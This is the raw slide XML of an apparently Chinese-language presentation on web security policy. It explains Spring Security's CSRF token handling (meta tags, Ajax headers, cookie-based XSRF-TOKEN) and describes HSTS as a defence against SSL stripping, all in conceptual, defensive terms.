            <a:ext cx="609600" cy="60960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8320435" y="5116677"/>
            <a:ext cx="9268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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Denny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07641193"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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9" dur="6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0" dur="62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1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2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41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3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1.875E-6 -0.03982 L 1.875E-6 0.08703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4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30000" decel="3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875E-6 -0.03982 L 1.875E-6 4.44444E-6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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1023257" y="1183267"/>
            <a:ext cx="10216243" cy="4941999"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="4400255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>防范</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4324636" cy="39187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Ajax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和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JSON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请求：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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采用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JSON,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将不能使用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HTTP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参数提交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CSRR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令牌。你可以采用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HTTP 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头提交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CSRF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令牌。将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CSRF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令牌加入到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meta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标签中。如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="14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Aajax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请求中包含令牌，如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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采用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Cookie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存储</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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使用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Cookie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存储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CSRF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令牌，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400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14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CookieCsrfTokenRepository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默认将C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SRF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令牌以</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>XSRF-TOKEN</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>名称写入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>中，并且在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>头中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</a:rPr>
                <a:t>以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</a:rPr>
                <a:t>X-XSRF-TOKEN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</a:rPr>
                <a:t>名称读取或者以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</a:rPr>
                <a:t>_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>csrf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</a:rPr>
                <a:t>名称的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</a:rPr>
                <a:t>HTTP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</a:rPr>
                <a:t>参数读取。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> 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</a:rPr>
                <a:t>配置如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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zh-CN" altLang="en-US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828" y="2233258"/>
            <a:ext cx="5342857" cy="120956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828" y="3668777"/>
            <a:ext cx="4914286" cy="1249262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1828" y="5647348"/>
            <a:ext cx="8123809" cy="108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510286"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1023257" y="1183267"/>
            <a:ext cx="10216243" cy="4941999"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="4400255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>防范</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4324636" cy="39187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Ajax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和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JSON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请求：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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采用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JSON,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将不能使用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HTTP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参数提交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CSRR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令牌。你可以采用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HTTP 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头提交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CSRF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令牌。将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CSRF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令牌加入到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meta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标签中。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JSP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示例如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="14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Aajax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请求中包含令牌，如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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采用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Cookie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存储</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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使用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Cookie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存储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CSRF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令牌，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400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14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CookieCsrfTokenRepository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默认将C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SRF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令牌以</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>XSRF-TOKEN</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>名称写入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>中，并且在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>头中以</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>X-XSRF-TOKEN</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>名称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</a:rPr>
                <a:t>读取，但需要采用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>AngularJS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</a:rPr>
                <a:t>。配置如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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zh-CN" altLang="en-US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760" y="2253893"/>
            <a:ext cx="5342857" cy="120956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828" y="3697352"/>
            <a:ext cx="4914286" cy="1249262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1828" y="5647348"/>
            <a:ext cx="8123809" cy="108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572376"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="276605" y="1567259"/>
            <a:ext cx="5210628" cy="3216265"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="5210628" cy="3216265"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="5134428" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HSTS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HTTP Strict Transport Security</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>）</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4948538" cy="2554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定义：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一个网站接受一个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HTTP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的请求，然后跳转到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HTTPS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，用户可能在开始跳转前，通过没有加密的方式和服务器对话，比如，用户输入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http://foo.com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或者直接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foo.com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。这样存在中间人攻击潜在威胁，跳转过程可能被恶意网站利用来直接接触用户信息，而不是原来的加密信息。网站通过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HTTP Strict Transport Security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通知浏览器，这个网站禁止使用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HTTP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方式加载，浏览器应该自动把所有尝试使用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HTTP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的请求自动替换为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HTTPS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请求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。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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HSTS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可以用来抵御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SSL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剥离攻击。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5487233" y="1567259"/>
            <a:ext cx="6623958" cy="3708708"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="3708708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54984" y="1890258"/>
              <a:ext cx="4540536" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>相关攻击示例和</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>SSL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>剥离攻击</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657" cy="3046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有的网站开启了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https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，但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为了更好的用户体验的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使用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体验同时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也支持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http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访问，当用户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http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访问的时候，就会返回给用户一个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302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重定向，重定向到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https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的地址，然后后续的访问都使用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https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传输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,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这种通信模式看起来貌似没有问题，但细致分析，就会发现种通信模式也存在一个风险，那就是这个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302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重定向可能会被劫持篡改，如果被改成一个恶意的或者钓鱼的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https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站点。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
                <a:t> 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SSL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剥离的实施方法是阻止浏览器与服务器创建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HTTPS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连接。它的前提是用户很少直接在地址栏输入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https://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，用户总是通过点击链接或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3xx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重定向，从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HTTP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页面进入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HTTPS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页面。所以攻击者可以在用户访问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HTTP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页面时替换所有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https://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开头的链接为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http://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，达到阻止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HTTPS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的目的。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs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4821820"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1023257" y="1183267"/>
            <a:ext cx="11023600" cy="4941999"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="4400255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
